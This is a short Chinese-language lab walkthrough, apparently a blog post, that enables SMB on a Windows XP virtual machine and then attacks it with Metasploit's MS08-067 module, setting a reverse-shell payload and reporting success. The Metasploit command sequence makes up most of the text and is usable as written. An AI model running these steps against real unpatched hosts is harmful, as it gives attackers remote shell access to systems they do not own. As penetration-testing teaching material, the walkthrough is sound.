第一步 安裝XP虛擬機
這裏用的系統版本如下
然後用nmap掃描XP系統的ip地址發現,掃不出來445端口,也就不用metasploit進行攻擊
所以先對XP設置一下
編輯註冊表HKEY_LOCAL_MACHINE=>SYSTEM=>CurrentControlSet=>Services=>NetBT=>Parameters
在Parameters上右鍵新建DWORD值,數值爲1,重命名爲SMBDeviceEnabled
然後重啓設備,再用nmap去掃描就可以發現,可以掃到445端口了
第二步 使用metasploit對XP發起攻擊
1 開啓metasploit
2 選擇攻擊模塊 exploit/windows/smb/ms08_067_netapi
3 查看參數 show options
4 設置目標主機 set rhosts 172.16.5.9
5 設置target: set target 34
6 設置payload:set payload windows/shell_reverse_tcp
7 查看設置完成的參數
8 執行攻擊 exploit
到此,攻擊成功!